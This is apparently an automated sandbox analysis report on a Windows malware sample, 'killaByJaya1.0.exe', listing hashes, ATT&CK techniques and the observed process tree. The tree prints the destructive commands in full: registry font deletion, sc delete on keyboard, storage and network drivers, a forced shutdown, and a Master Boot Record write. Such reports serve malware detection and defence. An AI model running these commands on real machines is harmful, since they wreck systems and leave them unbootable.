53195a269ff58ef0036cb110cb96ea79309f8148b7f8d42fecacc5b23c4bd375

Analysis

max time kernel
7s
max time network
11s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03/12/2024, 16:26

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

killaByJaya1.0.exe
Size

252KB
MD5

1aa4e7f082aea885328508c6dee744ff
SHA1

42e824b9827cc6195414df4fc32cb439b7d17ac9
SHA256

53195a269ff58ef0036cb110cb96ea79309f8148b7f8d42fecacc5b23c4bd375
SHA512

425397255f443691a4620f9c9bd4a1934012f7ce8d14d35513a7570129ebb7604a8033ca27a937eb49a824bd5f10fa0e64d5e638f2d43431ef2337c564c936eb
SSDEEP

3072:liGdrNgGQzYf6lLVuRMggN7RP7eHm1sgIkDHQto112a63ZDvbuhmuz3TZ4crkk0m:raZzfTuRzy7RyNSLP63Fk3TZ4crBnL9l

Score

8^/10

bootkit evasion execution persistence

Malware Config

Signatures

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	killaByJaya1.0.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4900	sc.exe
3500	sc.exe
2920	sc.exe
3208	sc.exe
3936	sc.exe
3484	sc.exe
3912	sc.exe
4984	sc.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "157"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3516	shutdown.exe
Token: SeRemoteShutdownPrivilege	3516	shutdown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4988	LogonUI.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 4564 wrote to memory of 2084	4564	killaByJaya1.0.exe	83
PID 4564 wrote to memory of 2084	4564	killaByJaya1.0.exe	83
PID 2084 wrote to memory of 468	2084	cmd.exe	84
PID 2084 wrote to memory of 468	2084	cmd.exe	84
PID 4564 wrote to memory of 5112	4564	killaByJaya1.0.exe	85
PID 4564 wrote to memory of 5112	4564	killaByJaya1.0.exe	85
PID 5112 wrote to memory of 3208	5112	cmd.exe	86
PID 5112 wrote to memory of 3208	5112	cmd.exe	86
PID 4564 wrote to memory of 4560	4564	killaByJaya1.0.exe	87
PID 4564 wrote to memory of 4560	4564	killaByJaya1.0.exe	87
PID 4560 wrote to memory of 3936	4560	cmd.exe	88
PID 4560 wrote to memory of 3936	4560	cmd.exe	88
PID 4564 wrote to memory of 2220	4564	killaByJaya1.0.exe	89
PID 4564 wrote to memory of 2220	4564	killaByJaya1.0.exe	89
PID 2220 wrote to memory of 3484	2220	cmd.exe	90
PID 2220 wrote to memory of 3484	2220	cmd.exe	90
PID 4564 wrote to memory of 756	4564	killaByJaya1.0.exe	91
PID 4564 wrote to memory of 756	4564	killaByJaya1.0.exe	91
PID 756 wrote to memory of 3912	756	cmd.exe	92
PID 756 wrote to memory of 3912	756	cmd.exe	92
PID 4564 wrote to memory of 1396	4564	killaByJaya1.0.exe	93
PID 4564 wrote to memory of 1396	4564	killaByJaya1.0.exe	93
PID 1396 wrote to memory of 4984	1396	cmd.exe	94
PID 1396 wrote to memory of 4984	1396	cmd.exe	94
PID 4564 wrote to memory of 1576	4564	killaByJaya1.0.exe	95
PID 4564 wrote to memory of 1576	4564	killaByJaya1.0.exe	95
PID 1576 wrote to memory of 4900	1576	cmd.exe	96
PID 1576 wrote to memory of 4900	1576	cmd.exe	96
PID 4564 wrote to memory of 2052	4564	killaByJaya1.0.exe	97
PID 4564 wrote to memory of 2052	4564	killaByJaya1.0.exe	97
PID 2052 wrote to memory of 3500	2052	cmd.exe	98
PID 2052 wrote to memory of 3500	2052	cmd.exe	98
PID 4564 wrote to memory of 1572	4564	killaByJaya1.0.exe	99
PID 4564 wrote to memory of 1572	4564	killaByJaya1.0.exe	99
PID 1572 wrote to memory of 2920	1572	cmd.exe	100
PID 1572 wrote to memory of 2920	1572	cmd.exe	100
PID 4564 wrote to memory of 628	4564	killaByJaya1.0.exe	101
PID 4564 wrote to memory of 628	4564	killaByJaya1.0.exe	101
PID 628 wrote to memory of 3516	628	cmd.exe	102
PID 628 wrote to memory of 3516	628	cmd.exe	102

C:\Users\Admin\AppData\Local\Temp\killaByJaya1.0.exe
"C:\Users\Admin\AppData\Local\Temp\killaByJaya1.0.exe"
1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c REG DELETE "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Fonts" /va /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Windows\system32\reg.exe
    REG DELETE "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Fonts" /va /f
    3⤵
    PID:468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete \Device\Harddisk0\DR0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5112
- - C:\Windows\system32\sc.exe
    sc delete \Device\Harddisk0\DR0
    3⤵
    - Launches sc.exe
    PID:3208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete i8042prt
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4560
- - C:\Windows\system32\sc.exe
    sc delete i8042prt
    3⤵
    - Launches sc.exe
    PID:3936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete kbdclass
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2220
- - C:\Windows\system32\sc.exe
    sc delete kbdclass
    3⤵
    - Launches sc.exe
    PID:3484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete iastorV
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:756
- - C:\Windows\system32\sc.exe
    sc delete iastorV
    3⤵
    - Launches sc.exe
    PID:3912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete msahci
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1396
- - C:\Windows\system32\sc.exe
    sc delete msahci
    3⤵
    - Launches sc.exe
    PID:4984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete NetBt
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Windows\system32\sc.exe
    sc delete NetBt
    3⤵
    - Launches sc.exe
    PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete Tcpip
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\system32\sc.exe
    sc delete Tcpip
    3⤵
    - Launches sc.exe
    PID:3500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete LanmanServer
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1572
- - C:\Windows\system32\sc.exe
    sc delete LanmanServer
    3⤵
    - Launches sc.exe
    PID:2920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c shutdown /s /f /t 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:628
- - C:\Windows\system32\shutdown.exe
    shutdown /s /f /t 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3516

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa399c855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4988